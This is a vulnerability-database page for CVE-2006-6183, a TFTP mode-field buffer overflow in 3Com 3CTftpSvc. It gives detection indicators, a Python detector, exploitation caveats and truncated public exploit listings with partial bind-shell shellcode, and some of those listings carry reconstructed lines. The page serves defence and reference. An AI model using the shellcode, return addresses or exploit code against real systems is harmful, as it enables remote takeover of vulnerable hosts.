CVE-2006-6183
Published: 2006-12-01
Summary: Multiple stack-based buffer overflows in 3Com 3CTftpSvc 2.0.1, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code.
Priority: P2 · CVSS 2.0 base score 10.0 (critical)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 70.57% (99.3th percentile)
Multiple stack-based buffer overflows in 3Com 3CTftpSvc 2.0.1, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long mode field (aka transporting mode) in a (1) GET or (2) PUT command.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 3com | 3ctftpsvc | <= 2.0.1 | — |
Detection & IOCs (extracted from the exploit sources listed below)
Bytes:
- \x00\x02: TFTP WRQ opcode prefix used by the exploit packets
- \x00\x02 + filename + \x00 + NOP*129 + shellcode + ret + \x00: layout of the exploit packet (the overlong "mode" field carries the sled, shellcode and return address)
Detection ideas:
- Alert on UDP/69 datagrams where the TFTP mode field (the bytes after the null-terminated filename) exceeds 460–470 bytes in an RRQ (opcode 0x0001) or WRQ (opcode 0x0002) request; 460 bytes is the threshold the original PoC gives for the crash.
- Inspect RRQ/WRQ datagrams (opcodes \x00\x01 and \x00\x02) on UDP/69 for NOP sleds (runs of 0x90, 73–129 bytes in the public exploits) immediately following the null-terminated filename.
- Match the known bind-shell shellcode byte sequences from the public exploits (e.g., starting with \x31\xc9\x83\xe9\xb0 or \x2b\xc9\x83\xe9\xb0) inside the mode field; these are encoder-specific (PexFnstenvSub) and will not match re-encoded payloads.
- Match the return addresses the public exploits use for user32.dll on Windows XP SP2 (\x3b\xe2\xd4\x77 or \x63\x20\xdc\x77, little-endian 4-byte sequences) inside the mode field.
- Flag any TFTP request whose mode field does not match the standard mode strings ('netascii', 'octet', 'mail', case-insensitive) and is anomalously long.
- After exploitation, the bind-shell payload listens on TCP/4444 on the TFTP host: watch for that port opening and for unexpected inbound connections to it on Windows hosts running 3CTftpSvc.
Caveats (from the exploit sources):
- The Metasploit module uses EXITFUNC=thread (later version) vs EXITFUNC=seh (earlier version); the return address differs between module versions and targets, so the correct target index must be matched to the victim OS/SP.
- The only bad character is \x00: a null byte terminates the TFTP mode field, so it cannot appear in the shellcode.
- Payload space is constrained (344–400 bytes depending on exploit version), so staged or small payloads must be used.
- The vulnerability affects 3CTftpSvc 2.0.1 and possibly earlier versions; the return addresses are OS/SP-specific and will not work across different Windows versions without adjustment.
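Added example, not code from this page or from any of the listed exploits: a small Python parser for TFTP RRQ/WRQ datagrams (RFC 1350 layout: opcode, filename, NUL, mode, NUL, optional RFC 2347 options) that applies the detection rules above to constructed sample packets. The thresholds (MODE_LEN_THRESHOLD, NONSTANDARD_MODE_LEN, NOP_SLED_MIN), the sample packets and the function names are assumptions made here; the return addresses and shellcode prefixes are the ones quoted in the list above. The suspect packet follows the quoted exploit layout but carries filler bytes where the shellcode would be.

```python
"""Parse TFTP requests and flag the CVE-2006-6183 indicators.

Added example; thresholds, sample packets and names are assumptions,
not values taken from the exploits on this page.
"""
import struct

TFTP_RRQ = 1
TFTP_WRQ = 2
STANDARD_MODES = {b"netascii", b"octet", b"mail"}
MODE_LEN_THRESHOLD = 460       # crash threshold given by the original PoC
NONSTANDARD_MODE_LEN = 32      # assumption: no real mode string is this long
NOP_SLED_MIN = 73              # shortest sled used by the public exploits
# Return addresses (user32.dll, XP SP2) and shellcode prefixes quoted above
KNOWN_RET_ADDRS = (b"\x3b\xe2\xd4\x77", b"\x63\x20\xdc\x77")
KNOWN_SC_PREFIXES = (b"\x31\xc9\x83\xe9\xb0", b"\x2b\xc9\x83\xe9\xb0")


def parse_tftp_request(payload: bytes):
    """Return (opcode, filename, mode, trailing) for an RRQ/WRQ, else None.

    Deliberately lenient: a mode field with no NUL terminator is still
    returned, because the exploit packet is terminated only after the
    return address. 'trailing' holds any RFC 2347 options.
    """
    if len(payload) < 4:
        return None
    opcode = struct.unpack("!H", payload[:2])[0]
    if opcode not in (TFTP_RRQ, TFTP_WRQ):
        return None
    filename, sep, rest = payload[2:].partition(b"\x00")
    if not sep:
        return None
    mode, _, trailing = rest.partition(b"\x00")
    return opcode, filename, mode, trailing


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of one byte value (used for NOP sleds)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def analyze(payload: bytes) -> list:
    """Return the names of the detection rules that fire for one UDP/69 datagram."""
    parsed = parse_tftp_request(payload)
    if parsed is None:
        return []
    _, _, mode, _ = parsed
    hits = []
    if len(mode) > MODE_LEN_THRESHOLD:
        hits.append("mode_field_overlong")
    if mode.lower() not in STANDARD_MODES and len(mode) > NONSTANDARD_MODE_LEN:
        hits.append("mode_nonstandard_and_long")
    if longest_run(mode, 0x90) >= NOP_SLED_MIN:
        hits.append("nop_sled")
    if any(prefix in mode for prefix in KNOWN_SC_PREFIXES):
        hits.append("known_shellcode_prefix")
    if any(ret in mode for ret in KNOWN_RET_ADDRS):
        hits.append("known_return_address")
    return hits


def build_request(opcode: int, filename: bytes, mode: bytes) -> bytes:
    """Assemble an RRQ/WRQ datagram: opcode | filename NUL | mode NUL."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


# Constructed samples: a normal read request, and a WRQ laid out like the
# public exploit packet (NOP sled, then opaque filler standing in for the
# shellcode, then an XP SP2 return address). No real shellcode is included.
BENIGN = build_request(TFTP_RRQ, b"config.bin", b"octet")
SUSPECT = build_request(
    TFTP_WRQ, b"test",
    b"\x90" * 129 + b"A" * 344 + b"\x3b\xe2\xd4\x77",
)

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, len(pkt), "bytes ->", analyze(pkt) or "clean")
```

Feed `analyze()` the UDP payload of each datagram to port 69; a real sensor would also count opcode 1/2 datagrams per source to catch the brute-force retries that the OS/SP-specific return addresses make likely.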
No detection rules found.
Exploit-DB · 2010-05-09
3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit)
---
##
# $Id: threectftpsvc_long_mode.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# The lines between "Metasploit3" and 'Name' were lost in extraction (the
# "<" was swallowed as an HTML tag); restored from the standard Metasploit
# 3.x module skeleton. The listing is truncated at 'Reference on the page.
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => '3CTftpSvc TFTP Long Mode Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By
sending a specially crafted packet with an overly long mode
field, a remote attacker could overflow a buffer and execute
arbitrary code on the system.
},
'Author' => 'MC',
'Version' => '$Revision: 9262 $',
'Reference
Exploit-DB · 2007-02-28
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
---
#!/usr/bin/perl -w
use strict;
use IO::Socket;   # needed for IO::Socket::INET below
# ===============================================================================================
# 3Com TFTP Service
# (the rest of the header and the usage check were lost in extraction; only
# the end of the usage message and the exit survive)
#  \n\n";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9
Exploit-DB · 2007-01-21
3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)
---
package Msf::Exploit::3com_tftp_long_mode;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
my $advanced =
{
};
my $info =
{
'Name' => 'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability',
'Version' => '$ 1.0 $',
'Authors' => ['Enseirb ', ],
'Description' =>
Pex::Text::Freeform(qq{
This vulnerability is caused due to a boundary error during the processing of TFTP Read/Write request packet types. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted packet with an overly long mode field (more than 460 bytes).
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The
Exploit-DB · 2006-11-30
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
---
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\x
Exploit-DB · 2006-11-27
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)
---
#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
# SUMMARY:
# 3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://support.3com.com/software/utilities_for_windows_32_bit.htm
# or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers
# to execute arbitrary commands or cause a denial of service. This flaw is
# due to a buffer overflow error when handling an overly lo
Metasploit
3CTftpSvc TFTP Long Mode Buffer Overflow
This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/23113
- http://securityreason.com/securityalert/1930
- http://www.securityfocus.com/archive/1/452754/100/0/threaded
- http://www.securityfocus.com/bid/21301
- http://www.securityfocus.com/bid/21322
- http://www.vupen.com/english/advisories/2006/4738
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30545